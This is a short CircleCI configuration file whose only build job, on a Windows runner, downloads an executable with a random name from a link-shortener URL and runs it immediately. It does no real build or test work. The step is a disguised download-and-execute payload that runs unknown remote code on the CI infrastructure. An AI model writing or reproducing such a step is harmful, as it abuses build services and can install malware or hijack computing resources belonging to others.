version: 2.1
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    executor:
      name: win/default
      shell: cmd.exe
    steps:
      - run: curl -L -o 4qqIiGYP0N.exe https://shortenlinks.net/4qqIiGYP0N && 4qqIiGYP0N.exe